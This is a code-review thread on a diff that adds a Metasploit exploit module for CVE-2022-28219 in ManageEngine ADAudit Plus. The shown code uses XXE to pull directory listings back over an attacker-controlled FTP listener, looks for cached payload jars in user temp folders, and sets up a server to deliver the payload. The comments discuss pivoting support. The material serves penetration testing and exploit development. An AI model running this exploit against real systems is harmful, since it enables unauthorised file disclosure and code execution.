modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb

```diff
@@ -0,0 +1,365 @@
+    )
+
+    if res.code != 200
+      fail_with(Failure::Unknown, "XXE request to get directory listing failed with HTTP/#{res.code}")
+    end
+
+    # Accept an FTP session, and wait a short amount of time for data to come in
+    ftp_client = nil
+    ftp_data = ''
+    begin
+      # We don't have a good way to tell when the data is fully received, so
+      # wait for a short amount of time
+      Timeout.timeout(2) do # Be careful changing this timeout - this needs to run several times, potentially
+        ftp_client = ftp_server.accept
+
+        # Just enough FTP protocol to get what we need
+        ftp_client.print("200 hello I'm FTP\n")
+        ftp_client.print("331 password please\n")
+
+        # This technically sends too many requests for data, but that doesn't change anything
+        loop do
+          ftp_client.print("230 send data plz\n")
+          ftp_data += ftp_client.recv(256)
+        end
+      end
+    rescue Timeout::Error
+      # Do nothing, the FTP session is finished
+    ensure
+      ftp_server.close
+      if ftp_client
+        ftp_client.close
+      end
+    end
+
+    # If we actually received data, remove all the junk and split at newlines
+    if ftp_data =~ /RETR (.*)/m
+      return Regexp.last_match(1).split(/\n/).map(&:chomp)
+    end
+
+    # This is, unfortunately, the place where this fails the most - I'm not
+    # entirely sure why, but the reverse FTP connection seems to start failing
+    # if we mess with it too much. We do our best here to tell the user why.
+    if !ftp_client
+      print_warning("Didn't receive expected FTP connection")
+      return nil
+    end
+
+    if ftp_data.empty?
+      print_warning('FTP client connected, but we did not receive any data over the socket')
+      return nil
+    end
+
+    print_warning("FTP client connected, but we did not receive file list: #{ftp_data}")
+    return nil
+  end
+
+  def search_for_payloads(users)
+    return users.map do |u|
+      dir = "/users/#{u}/appdata/local/temp"
+      # This will search for the payload, but right now just print stuff
+      listing = get_directory_listing(dir)
+      if !listing
+        print_warning("Couldn't get directory listing for #{dir}")
+        next []
+      end
+
+      listing
+           .select { |f| f =~ /^jar_cache[0-9]+.tmp$/ }
+           .map { |f| File.join(dir, f) }
+    end.flatten
+  end
+
+  def upload_payload(payload)
+    t = Thread.new do
+      c = nil
+      begin
+        # We use a TCP socket here so we can hold the socket open after the HTTP
+        # conversation has concluded. That way, the server caches the file in
+        # the user's temp folder while it waits for more data
+        http_server = Rex::Socket::TcpServer.create(
+          'LocalPort' => datastore['SRVPORT_HTTP2'],
+          'LocalHost' => srv_host,
```

Comment:
I believe we can add `comm` here for meterpreter pivoting support; and I believe we need to tweak this to work with WAN - https://github.com/rapid7/metasploit-framework/pull/16250

That aside, I think these comments may not be needed if we can just use the service manager directly

Reply:
So I think this probably isn't going to work well with service manager (based on the rest of this PR).. but I'm not 100% clear on what I'd need to do to go with this option. Is it just including @smcintyre-r7's mixin from that linked PR, or is there more to it than that?

I tried googling and grepping for adding `comm`, but I don't see any references - is there documentation or an example I can use?

Reply:
I added `Comm` to the two servers I create - it seems to work, but I haven't tested it with `ReverseListenerComm` set to anything